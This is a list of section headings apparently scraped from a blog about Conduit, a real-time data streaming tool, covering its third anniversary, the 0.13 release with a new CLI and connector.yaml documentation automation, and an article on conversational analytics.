
Enhancing User Experience and Decision-Making

Technical Architecture for Conversational Analytics

Driving Business Value

Strategic Implications for Business Leaders

Embracing the Future Today

Overcoming Barriers and Building a Data-Driven Culture

Conclusion

🎉 Celebrating Three Years of Conduit: A Revolution in Real-Time Data Streaming!

Why We Built Conduit

Messages from the team

A Huge Thank You to Our Amazing Community!

Key Community Milestones

Conduit's Evolution: Major Milestones & Game-Changing Releases!

Looking Ahead

New Release Conduit 0.13: Advanced Automation, New CLI, and 5x Performance Gains

Deprecation of the User Interface

Expanded Command-Line Interface (CLI) Capabilities

Why This Matters

How It Works

Automating Connector Documentation with connector.yaml

Why This Matters

How We Solved It

5x Performance Boost for Output Processing

Why This Matters

How We Improved It

Get Started with Conduit 0.13 Today

What’s Next?

Automating documentation for 100+ connectors

The Challenge: Keeping Connector Documentation in Sync

Goals

1: Connector configuration is documented and always up-to-date

2: A central place with all connector information

3: Easy to use for developers

The solution

What is connector.yaml?

How is a connector.yaml populated?

Next steps

Introducing the New Conduit CLI: A Powerful Tool for Managing Your Pipelines

Why the Conduit CLI Matters

Built on Ecdysis: A Flexible Library for CLI Tools

Getting Started with Conduit CLI

Initializing Conduit

Managing Connector Plugins

Listing Connector Plugins

Describing a Specific Plugin

Automating Connector Documentation with `connector.yaml`

What is `connector.yaml`?

How is a `connector.yaml` populated?